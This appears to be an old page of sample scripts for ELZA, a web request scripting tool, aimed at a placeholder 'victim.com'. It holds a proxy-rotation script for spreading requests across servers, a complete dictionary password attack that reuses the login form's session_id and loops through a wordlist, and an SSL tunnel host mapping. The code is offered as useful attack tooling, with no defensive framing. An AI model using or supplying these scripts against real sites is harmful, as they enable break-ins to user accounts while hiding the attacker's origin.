Those are some samples of code that one may find useful: 1. PROXY ROTATION # First, push values into PROXY and PORT. Each time we use one of # those substs, the next available value is substituted. subst PROXY @ proxy.domain1.com proxy.domain2.com proxy.domain3.com subst PORT @ 3128 8080 80 # the BEFOREREQUEST proc is automatically executed before making # a request to remote server. This allows us to set a proxy server. proc BEFOREREQUEST # Push the next avaiable values from PROXY and PORT into # the respective system variable var proxy = PROXY var port = PORT endproc BEFOREREQUEST # And now we do the requests we want to do. Each of them is piped # through a different proxy server. get url http://www.victim.com/page1.html get url http://www.victim.com/page2.html get url http://www.victim.com/page3.html get url http://www.victim.com/page4.html get url http://www.victim.com/page5.html In this example, page1.html is requested through proxy.domain1.com on port 3128, page2.html is requested through proxy.domain2.com:8080, and page3.html - through proxy.domain3.com:80. page4.html is requested again through the first proxy, page5.html - through the second and so on. Cool, isn't it? 2. DICTIONARY ATTACK This script is to serve as an example on how one can write a dictionary attacks work using the ELZA. I guess many web site administrators are not THAT stupid after all. If they lock out an account after several wrong passwords, you can do nothing. # First, we define the static things subst ACCOUNT = bozo # We request the actual login form so that we can examine it get url http://www.victim.com/loginform.html # Then, we grab the very important session_id hidden form field, # so that we pass it along with each of our login attempts. field session_id $ # Then, we save the form field value we just grabbed into a subst # so that we can use it in the future. subst SID f= session_id # Next, we define a procedure to be executed if our attack is # successful. proc SUCCESS print WOW! Login: ACCOUNT, Password: CURRPASS endproc SUCCESS # Then, we define the procedure that tries to break in proc TRYPASSWORD # All necessary fields should be set before the request, # because they are cleared after each request. field username = ACCOUNT field password = CURRPASS # We set the session_id form field value we hijacked from the # legitimate login form. field session_id = SID # And we do a POST to the login script post url http://www.victim.com/cgi-bin/login.cgi # Next, we check if we were successful and if we are, # we call the SUCCESS procedure. call SUCCESS if body != Login failed! endproc TRYPASSWORD # And finally, we define the main loop that is to execute the # TRYPASSWORD for each password from our dictionary file (dict.txt) call TRYPASSWORD CURRPASS % dict.txt 3. AVOIDING SPAWINING THE SSL TUNNEL REPEATEDLY This should work as follows: 1. Spawn the tunnel before running the ELZA Script. 2. In the elza script, do a hostmap for the host you want to connect to: # Tell ELZA not to spawn tunnel when encountering https:// var honorhttps = no # Tell ELZA to pipe all request to secure-server.victim.com # on port 443 to localhost, port 24242 hostmap secure-server.victim.com 443 localhost 24242 That is all for now. If you have a piece of code you would like to be included, please pass it on to philip_stoev@iname.com.